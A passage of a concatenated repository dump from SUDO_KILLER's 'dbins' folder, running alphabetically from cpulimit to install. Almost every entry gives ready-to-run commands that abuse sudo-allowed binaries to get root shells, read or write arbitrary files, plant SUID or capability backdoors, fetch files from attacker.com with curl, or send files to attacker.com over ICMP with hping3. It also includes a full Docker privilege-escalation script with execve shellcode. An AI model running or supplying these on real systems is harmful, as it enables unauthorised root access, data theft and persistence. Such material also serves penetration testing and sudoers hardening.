5 | * sudo cpulimit -l 100 -f /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/crash.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * This invokes the default pager, which is likely to be less, other 6 | functions may apply. 7 | sudo crash -h 8 | !sh 9 | -------------------------------------------------------------------------------- /dbins/crontab.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * The commands are executed according to the crontab file edited via the 6 | crontab utility. 7 | sudo crontab -e 8 | -------------------------------------------------------------------------------- /dbins/csh.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo csh 6 | -------------------------------------------------------------------------------- /dbins/csplit.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_read 6 | csplit $LFILE 1 7 | cat xx01 8 | -------------------------------------------------------------------------------- /dbins/csvtool.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo csvtool call '/bin/sh;false' /etc/passwd 6 | -------------------------------------------------------------------------------- /dbins/cupsfilter.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo cupsfilter -i application/octet-stream -m application/octet-stream 7 | $LFILE 8 | -------------------------------------------------------------------------------- /dbins/curl.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * Fetch a remote file via HTTP GET request. 6 | URL=http://attacker.com/file_to_get 7 | LFILE=file_to_save 8 | sudo curl $URL -o $LFILE 9 | -------------------------------------------------------------------------------- /dbins/cut.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_read 6 | sudo cut -d "" -f1 "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/dash.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo dash 6 | -------------------------------------------------------------------------------- /dbins/date.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo date -f $LFILE 7 | -------------------------------------------------------------------------------- /dbins/dc.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo dc -e '!/bin/sh' 6 | -------------------------------------------------------------------------------- /dbins/dd.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_write 6 | echo "data" | sudo dd of=$LFILE 7 | -------------------------------------------------------------------------------- /dbins/debugfs.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo debugfs 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/dialog.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo dialog --textbox "$LFILE" 0 0 7 | -------------------------------------------------------------------------------- /dbins/diff.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo diff --line-format=%L /dev/null $LFILE 7 | -------------------------------------------------------------------------------- /dbins/dig.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_read 6 | sudo dig -f $LFILE 7 | -------------------------------------------------------------------------------- /dbins/distcc.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo distcc /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/dmesg.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * This invokes the default pager, which is likely to be less, other 6 | functions may apply. 7 | sudo dmesg -H 8 | !/bin/sh 9 | -------------------------------------------------------------------------------- /dbins/dmidecode.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * It can be used to overwrite files using a specially crafted SMBIOS file 6 | that can be read as a memory device by dmidecode. Generate the file with 7 | dmiwrite and upload it to the target. 8 | o --dump-bin, will cause dmidecode to write the payload to the 9 | destination specified, prepended with 32 null bytes. 10 | o --no-sysfs, if the target system is using an older version of 11 | dmidecode, you may need to omit the option. 
12 | make dmiwrite 13 | TF=$(mktemp) 14 | echo "DATA" > $TF 15 | ./dmiwrite $TF x.dmi 16 | LFILE=file_to_write 17 | sudo dmidecode --no-sysfs -d x.dmi --dump-bin "$LFILE" 18 | -------------------------------------------------------------------------------- /dbins/dmsetup.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo dmsetup create base < $TF/x.sh 9 | fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF 10 | sudo dnf install -y x-1.0-1.noarch.rpm 11 | -------------------------------------------------------------------------------- /dbins/docker.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * The resulting is a root shell. 
6 | sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh 7 | -------------------------------------------------------------------------------- /dbins/docker_exp.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # SUDO Docker Privilege Escalation 4 | # https://github.com/pyperanger/dockerevil 5 | 6 | # SELINUX "bypass" using :z option 7 | # https://docs.docker.com/engine/admin/volumes/bind-mounts/#configure-the-selinux-label 8 | 9 | 10 | echo "[*] SUDO Docker Privilege Escalation"; 11 | 12 | echo "[+] Writing shellcode"; 13 | 14 | cat > /tmp/sud0-d0ck3r.c <<'EOF' 15 | 16 | #include 17 | #include 18 | 19 | unsigned char shellcode[] = \ 20 | "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"; 21 | int main() 22 | { 23 | setgid(0); 24 | setuid(0); 25 | int (*ret)() = (int(*)())shellcode; 26 | ret(); 27 | } 28 | 29 | EOF 30 | 31 | echo "[+] Compiling shellcode in container"; 32 | 33 | sudo docker run -t -v /tmp/:/tmp/:z pype/ubuntu_gcc /bin/sh -c 'gcc -fno-stack-protector -z execstack /tmp/sud0-d0ck3r.c -o /tmp/sud0-d0ck3r && chmod +xs /tmp/sud0-d0ck3r' 34 | 35 | echo "[+] r00t sh3ll !"; 36 | /tmp/sud0-d0ck3r 37 | -------------------------------------------------------------------------------- /dbins/dos2unix.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/dbins/dos2unix.txt -------------------------------------------------------------------------------- /dbins/dosbox.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * Note that the name of the written file in the following example will be 6 | FILE_TO_. Also note that echo terminates the string with a DOS-style line 7 | terminator (\r\n), if that’s a problem and your scenario allows it, you 8 | can create the file outside dosbox, then use copy to do the actual write. 9 | LFILE='\path\to\file_to_write' 10 | sudo dosbox -c 'mount c /' -c "echo DATA >c:$LFILE" -c exit 11 | -------------------------------------------------------------------------------- /dbins/dotnet.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo dotnet fsi 6 | System.Diagnostics.Process.Start("/bin/sh").WaitForExit();; 7 | -------------------------------------------------------------------------------- /dbins/dpkg.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * This invokes the default pager, which is likely to be less, other 6 | functions may apply. 7 | sudo dpkg -l 8 | !/bin/sh 9 | * It runs an interactive shell using a specially crafted Debian package. 10 | Generate it with fpm and upload it to the target. 
11 | TF=$(mktemp -d) 12 | echo 'exec /bin/sh' > $TF/x.sh 13 | fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF 14 | sudo dpkg -i x_1.0_all.deb 15 | -------------------------------------------------------------------------------- /dbins/dstat.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * echo 'import os; os.execv("/bin/sh", ["sh"])' >/usr/local/share/dstat/ 6 | dstat_xxx.py 7 | sudo dstat --xxx 8 | -------------------------------------------------------------------------------- /dbins/dvips.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * tex '\special{psfile="`/bin/sh 1>&0"}\end' 6 | sudo dvips -R0 texput.dvi 7 | ***** Limited SUID ***** 8 | If the binary has the SUID bit set, it may be abused to access the file system, 9 | escalate or maintain access with elevated privileges working as a SUID 10 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 11 | it only works on systems like Debian (<= Stretch) that allow the default sh 12 | shell to run with SUID privileges. 13 | This example creates a local SUID copy of the binary and runs it to maintain 14 | elevated privileges. To interact with an existing SUID binary skip the first 15 | command and run the program using its original path. 16 | * sudo install -m =xs $(which dvips) . 
17 | 18 | tex '\special{psfile="`/bin/sh 1>&0"}\end' 19 | ./dvips -R0 texput.dvi 20 | -------------------------------------------------------------------------------- /dbins/easy_install.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TF=$(mktemp -d) 6 | echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$ 7 | (tty)')" > $TF/setup.py 8 | sudo easy_install $TF 9 | -------------------------------------------------------------------------------- /dbins/eb.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo eb logs 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/ed.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ed 6 | !/bin/sh 7 | ***** Limited SUID ***** 8 | If the binary has the SUID bit set, it may be abused to access the file system, 9 | escalate or maintain access with elevated privileges working as a SUID 10 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 11 | it only works on systems like Debian (<= Stretch) that allow the default sh 12 | shell to run with SUID privileges. 13 | This example creates a local SUID copy of the binary and runs it to maintain 14 | elevated privileges. 
To interact with an existing SUID binary skip the first 15 | command and run the program using its original path. 16 | * sudo install -m =xs $(which ed) . 17 | 18 | ./ed 19 | !/bin/sh 20 | -------------------------------------------------------------------------------- /dbins/efax.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo efax -d "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/elvish.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo elvish 6 | -------------------------------------------------------------------------------- /dbins/emacs.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo emacs -Q -nw --eval '(term "/bin/sh")' 6 | -------------------------------------------------------------------------------- /dbins/env.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * sudo env /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/eqn.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo eqn "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/espeak.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo espeak -qXf "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/ex.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ex 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/exiftool.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_write 6 | INPUT=input_file 7 | sudo exiftool -filename=$LFILE $INPUT 8 | -------------------------------------------------------------------------------- /dbins/expand.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo expand "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/expect.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo expect -c 'spawn /bin/sh;interact' 6 | -------------------------------------------------------------------------------- /dbins/facter.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TF=$(mktemp -d) 6 | echo 'exec("/bin/sh")' > $TF/x.rb 7 | sudo FACTERLIB=$TF facter 8 | -------------------------------------------------------------------------------- /dbins/file.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * Each input line is treated as a filename for the file command and the 6 | output is corrupted by a suffix : followed by the result or the error of 7 | the operation, so this may not be suitable for binary files. 8 | LFILE=file_to_read 9 | sudo file -f $LFILE 10 | -------------------------------------------------------------------------------- /dbins/find.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo find . -exec /bin/sh \; -quit 6 | -------------------------------------------------------------------------------- /dbins/finger.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/dbins/finger.txt -------------------------------------------------------------------------------- /dbins/fish.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo fish 6 | -------------------------------------------------------------------------------- /dbins/flask.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | echo 'import pty; pty.spawn("/bin/bash")' > flask.py 6 | export FLASK_APP=flask.py 7 | sudo /usr/bin/flask run 8 | -------------------------------------------------------------------------------- /dbins/flock.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo flock -u / /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/fmt.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * This corrupts the output by wrapping very long lines at the given width. 6 | LFILE=file_to_read 7 | sudo fmt -999 "$LFILE" 8 | -------------------------------------------------------------------------------- /dbins/fold.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo fold -w99999999 "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/fping.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_read 6 | sudo fping -f $LFILE 7 | -------------------------------------------------------------------------------- /dbins/ftp.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ftp 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/gawk.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo gawk 'BEGIN {system("/bin/sh")}' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which gawk) . 
16 | 17 | ./gawk 'BEGIN {system("/bin/sh")}' 18 | -------------------------------------------------------------------------------- /dbins/gcc.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo gcc -wrapper /bin/sh,-s . 6 | -------------------------------------------------------------------------------- /dbins/gcloud.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * This invokes the default pager, which is likely to be less; other 6 | gcloud subcommands that page their output can be abused the same way. 7 | sudo gcloud help 8 | !/bin/sh 9 | -------------------------------------------------------------------------------- /dbins/gcore.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo gcore $PID 6 | -------------------------------------------------------------------------------- /dbins/gdb.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * sudo gdb -nx -ex '!sh' -ex quit 6 | ***** Capabilities ***** 7 | If the binary has the Linux CAP_SETUID capability set or it is executed by 8 | another binary with the capability set, it can be used as a backdoor to 9 | maintain privileged access by manipulating its own process UID. 10 | * This requires that GDB is compiled with Python support. 11 | cp $(which gdb) . 12 | sudo setcap cap_setuid+ep gdb 13 | 14 | ./gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit 15 | -------------------------------------------------------------------------------- /dbins/gem.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * This requires the name of an installed gem to be provided (rdoc is 6 | usually installed). 7 | sudo gem open -e "/bin/sh -c /bin/sh" rdoc 8 | -------------------------------------------------------------------------------- /dbins/genie.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo genie -c '/bin/sh' 6 | -------------------------------------------------------------------------------- /dbins/genisoimage.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_read 6 | sudo genisoimage -q -o - "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/ghc.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ghc -e 'System.Process.callCommand "/bin/sh"' 6 | -------------------------------------------------------------------------------- /dbins/ghci.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ghci 6 | System.Process.callCommand "/bin/sh" 7 | -------------------------------------------------------------------------------- /dbins/gimp.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo gimp -idf --batch-interpreter=python-fu-eval -b 'import os; 6 | os.system("sh")' 7 | -------------------------------------------------------------------------------- /dbins/ginsh.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * sudo ginsh 6 | !/bin/sh 7 | ***** Limited SUID ***** 8 | If the binary has the SUID bit set, it may be abused to access the file system, 9 | escalate or maintain access with elevated privileges working as a SUID 10 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 11 | it only works on systems like Debian (<= Stretch) that allow the default sh 12 | shell to run with SUID privileges. 13 | This example creates a local SUID copy of the binary and runs it to maintain 14 | elevated privileges. To interact with an existing SUID binary skip the first 15 | command and run the program using its original path. 16 | * sudo install -m =xs $(which ginsh) . 17 | 18 | ./ginsh 19 | !/bin/sh 20 | -------------------------------------------------------------------------------- /dbins/grc.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo grc --pty /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/grep.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo grep '' $LFILE 7 | -------------------------------------------------------------------------------- /dbins/gtester.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * TF=$(mktemp) 6 | echo '#!/bin/sh' > $TF 7 | echo 'exec /bin/sh 0<&1' >> $TF 8 | chmod +x $TF 9 | sudo gtester -q $TF 10 | -------------------------------------------------------------------------------- /dbins/gzip.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo gzip -f $LFILE -t 7 | -------------------------------------------------------------------------------- /dbins/hd.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo hd "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/head.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo head -c1G "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/hexdump.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_read 6 | sudo hexdump -C "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/highlight.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo highlight --no-doc --failsafe "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/hping3.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo hping3 6 | /bin/sh 7 | * The file is continuously sent, adjust the --count parameter or kill the 8 | sender when done. Receive on the attacker box with: 9 | sudo hping3 --icmp --listen xxx --dump 10 | RHOST=attacker.com 11 | LFILE=file_to_read 12 | sudo hping3 "$RHOST" --icmp --data 500 --sign xxx --file "$LFILE" 13 | -------------------------------------------------------------------------------- /dbins/iconv.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_read 6 | sudo iconv -f 8859_1 -t 8859_1 "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/iftop.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo iftop 6 | !/bin/sh 7 | ***** Limited SUID ***** 8 | If the binary has the SUID bit set, it may be abused to access the file system, 9 | escalate or maintain access with elevated privileges working as a SUID 10 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 11 | it only works on systems like Debian (<= Stretch) that allow the default sh 12 | shell to run with SUID privileges. 13 | This example creates a local SUID copy of the binary and runs it to maintain 14 | elevated privileges. To interact with an existing SUID binary skip the first 15 | command and run the program using its original path. 16 | * sudo install -m =xs $(which iftop) . 17 | 18 | ./iftop 19 | !/bin/sh 20 | -------------------------------------------------------------------------------- /dbins/install.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 